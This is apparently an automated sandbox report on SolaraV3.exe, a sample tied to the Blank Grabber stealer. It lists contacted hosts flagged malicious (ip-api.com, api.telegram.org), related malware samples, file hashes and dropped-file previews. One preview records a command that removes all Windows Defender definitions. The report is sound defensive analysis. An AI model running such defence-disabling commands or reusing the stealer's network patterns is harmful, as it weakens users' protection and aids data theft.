                                                                                                                                                                                                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://login.microsoftonline.comSolaraV3.exe, 00000002.00000002.2043957200.000001FC25BE8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://cacerts.digicert.coSolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.drfalse
                                                                                                                                                                                                          https://html.spec.whatwg.org/multipage/SolaraV3.exe, 00000002.00000002.2039868154.000001FC25370000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://www.ifeng.com/SolaraV3.exe, 00000002.00000002.2042112590.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772579209.000001FC25648000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1736269912.000001FC25649000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsSolaraV3.exe, 00000002.00000002.2043341450.000001FC25770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://www.zhihu.com/SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://www.rfc-editor.org/rfc/rfc8259#section-8.1SolaraV3.exe, 00000002.00000003.1708990356.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038759505.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://contoso.com/powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://oneget.orgXpowershell.exe, 0000004A.00000002.1847941368.00000239E7EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://github.com/Unidata/MetPy/blSolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            208.95.112.1
                                                                                                                                                                                                                            ip-api.comUnited States
                                                                                                                                                                                                                            53334TUT-ASUStrue
                                                                                                                                                                                                                            149.154.167.220
                                                                                                                                                                                                                            api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                            62041TELEGRAMRUtrue
                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                            127.0.0.1
                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1525849
                                                                                                                                                                                                                            Start date and time:2024-10-04 15:30:51 +02:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 13m 44s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:127
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:SolaraV3.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@199/58@4/3
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 50%
                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                            • Successful, ratio: 95%
                                                                                                                                                                                                                            • Number of executed functions: 132
                                                                                                                                                                                                                            • Number of non-executed functions: 194
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe
                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 142.250.185.131, 184.28.90.27
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, login.live.com, e16604.g.akamaiedge.net, gstatic.com, prod.fs.microsoft.com.akadns.net
                                                                                                                                                                                                                            • Execution Graph export aborted for target mshta.exe, PID 6484 because there are no executed function
                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 5736 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 6044 because it is empty
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                            • VT rate limit hit for: SolaraV3.exe
                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            09:32:18API Interceptor7x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                            09:32:20API Interceptor166x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                            09:32:23API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            208.95.112.1SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                            SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                            Aviso de cuenta vencida de DHL - 1606622076_865764325678976645423546567678967564423567890008765.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                            enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                            POP.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                                                            • ip-api.com/json/
                                                                                                                                                                                                                            gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                                                                            • ip-api.com/json/?fields=11827
                                                                                                                                                                                                                            dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                                                                            • ip-api.com/json/?fields=11827
                                                                                                                                                                                                                            kUiqbpzmbo.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                            uidiscord.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                            mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            ip-api.comSolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            Aviso de cuenta vencida de DHL - 1606622076_865764325678976645423546567678967564423567890008765.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            POP.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            kUiqbpzmbo.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            uidiscord.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            api.telegram.orgSolaraV4.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                            yvDk2VZluODBu6S.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                            Payment Advice Note.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                            Confirmation transfer AGS # 03-10-24.scr.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                            Urgent inquiry for quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                            Payment Advice - Advice Ref pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                            Ziraat Bankasi Swift Mesaji_20241003_3999382.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                            doc_20241003_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                            MT103-93850.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                            StatementXofXaccount.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            TUT-ASUSSolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            Aviso de cuenta vencida de DHL - 1606622076_865764325678976645423546567678967564423567890008765.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            POP.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            kUiqbpzmbo.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            uidiscord.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                                            Entropy (8bit):0.7067135979101867
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqg:2JIB/wUKUKQncEmYRTwh08
                                                                                                                                                                                                                            MD5:FA1B503F545AC5025616A4E336142738
                                                                                                                                                                                                                            SHA1:F570917FC4767D0D3683EEA8244037842FB8F1D6
                                                                                                                                                                                                                            SHA-256:52B744629D22B44690AE331DDFD058E92C123E635A3B12B5A43B7CEE6F1F4C07
                                                                                                                                                                                                                            SHA-512:301C45D3761ADBD471BF20BFCB85140BFAC79F290DC4B8A78DBCF8E4B57D30B269D4893685DAE7A046F226C29852D95DFA570B83591DAE42460C5C4A41E636C7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x261b5efc, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                                            Entropy (8bit):0.7900132230426481
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:rSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:razaPvgurTd42UgSii
                                                                                                                                                                                                                            MD5:B9F57D2C31850D0D42EE4D312280C220
                                                                                                                                                                                                                            SHA1:AA5B3532DDAA89C1B0F89E8672B5918091B50DE5
                                                                                                                                                                                                                            SHA-256:3DDE8EEC3FC45997C7153B9927227AD9B21F5B757ACB5EDD227BA9D0D0E71703
                                                                                                                                                                                                                            SHA-512:8B3184DED4B18466D2D6C92ACE7E1BB10FD3875E29425D699F303FF0CB71C18DE7B659E737F4915682D3913C7772BB9652D21EDA009E3AD2FD8EC4618FFA9526
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:&.^.... ...............X\...;...{......................0.`.....42...{5.. ...|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................^F... ...|..................\.M3. ...|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                            Entropy (8bit):0.08201075387489457
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:a9mtyYeFShorzeqt/57Dek3JuL5vg1lillEqW3l/TjzzQ/t:asyzFSorzPR3tuFvg1Imd8/
                                                                                                                                                                                                                            MD5:034638717F142777A4950835FC2C2636
                                                                                                                                                                                                                            SHA1:7BB0E571983F79651A8649AF8BE99994E296E7DC
                                                                                                                                                                                                                            SHA-256:86DBEA30CE3977965EBA207BABD5C3948373D8B8B45103205C601DE49DF42768
                                                                                                                                                                                                                            SHA-512:D84769732574B6C09CBD411A08CDD1C155DCA9D6670217EA9B4B3EF2EC169BAA0F39309BAE92EA8DDA3FC88AF6272DF0531906D1260EB42F1123A311764D50D3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:6.rH.....................................;...{... ...|..42...{5.........42...{5.42...{5...Y.42...{59................\.M3. ...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):692651
                                                                                                                                                                                                                            Entropy (8bit):7.923325303211332
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:HYK5D0vhAW57nrWNUx5XxRzUsD+ZoIXSVEFO3Oqpzp2VgW9dw8f6/rGN0JZNcE63:H75D4NtnnhmEGhyW0Oqpyh/i/r6qNE3
                                                                                                                                                                                                                            MD5:0B52B4809172F2B581D3D01E3111BA27
                                                                                                                                                                                                                            SHA1:23F526684310861FB063F33B92F5937E3F0E42EF
                                                                                                                                                                                                                            SHA-256:338A581F7C28EDA4BC66F4C627C3C399BE98D6D048AF89A9E0EA4C2BCB61E380
                                                                                                                                                                                                                            SHA-512:03E50BA83E4AEC463781FE7968D2202C70728E58C0B443EA428BD85D3E8CE5F320F9C0ECF1E5759295D1E85507919AFFE71BA153992904A7535222445EDC90B8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....mGy..O>rw...~7......k..d..}oX..m.r.YH......l0Q ."....Y..AH(..BGYB9...M...........k.u...c.FU}.U..>.s~.9{.c.J..!<>.<wLnE...:...^?....a.......}1........Fd....k...=...f.......#...M..;).....g.^.3G..?...S.nPzG<0/f>)..I....f>.p...`,3.5.?v.....}..y1.....3.....-....g.....J.o...._.hz.c...L3.c....>..w..~....\...y[..;n.... .o[...y1......F..b./...>.,`..9o......e.1..o....7.8.eo..y...e.k.y....[....u...c......2c.......t,{.s.y.......?.6-?..9,{...W\UZb.W....W..y.1{...2.^.9.........<......xf.+.^-.5..._^.x.+...W\.V...8.......|n.......O+^.s....8 _w....~.......>..>./...c...iW.xEZ.sV.v...G......ua.c.,......zl&_...8,..b.o..e{..*......>...j..o.{...}....{\..._P.e{..........u0....k...%o.>......._.?....W.yAi5Vl..y....W`....{...3...rNa...19y.!,...B.Glf......;..fv<..W..7C..........}......v.kv.s;....x..9o.....us....q....<.<.~o..S...J^o.3KL....bN
                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):894
                                                                                                                                                                                                                            Entropy (8bit):3.1151413953281115
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:Q58KRBubdpkoPAGdjr8Akk9+MlWlLehW51ICFA9:QOaqdmOFdjr8g+kWResLIUm
                                                                                                                                                                                                                            MD5:8CD82B477D6BFB3E2E42326E9B64A327
                                                                                                                                                                                                                            SHA1:A9CAF90BD019B95A93FEABD63A8BDC4EEDA20A3C
                                                                                                                                                                                                                            SHA-256:D88A12EEF3C7EA6F2C1045998D4BEEB6381CD8A6C8AF25E85FA356676139C010
                                                                                                                                                                                                                            SHA-512:52BAA8C6BB45C5F9A984615C2074D28485D2C24A4DB32F690006ED183BCAB0394A4196B7CD076915A650E5971D9970E5468ABE1B509F68C2B5E0CA139933F886
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. O.c.t. .. 0.4. .. 2.0.2.4. .0.9.:.3.2.:.4.1.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. O.c.t. .. 0.4. .. 2.0.2.4. .0.9.:.3.2.:.4.1.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4c2, 9 symbols, created Fri Oct 4 15:28:40 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):1384
                                                                                                                                                                                                                            Entropy (8bit):4.142617250372747
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:HiW97cj/cMZHAwKUS8NWI+ycuZhNK+akSVfPNnqSid:v+ZPK/841ulja3PqSy
                                                                                                                                                                                                                            MD5:B58032395A006D21A4AD1E696312D974
                                                                                                                                                                                                                            SHA1:BBE08899A0EF06C6D3C1E26B890A3CAB7FCC16B2
                                                                                                                                                                                                                            SHA-256:352E3D1733644C6D50A9B60F713462FEF2D8D3D97D17AF67FC9EAB1BABDDE669
                                                                                                                                                                                                                            SHA-512:75E20086EAB5A9AC0169CB02345425F3B1723404CE8ACF730147CB39A195D67A727F6AD80427BB754D10533070D9718DB5401D39B37748103D1FAFED4839378C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:L......g.............debug$S............................@..B.rsrc$01........X.......h...........@..@.rsrc$02........P...r...............@..@........W....c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP.................$E........](.~...........7.......C:\Users\user~1\AppData\Local\Temp\RESF203.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.e.3.y.j.i.4.z...d.l.l.....(.
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):98224
                                                                                                                                                                                                                            Entropy (8bit):6.452201564717313
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                                                                                                            MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                                                                                                            SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                                                                                                            SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                                                                                                            SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
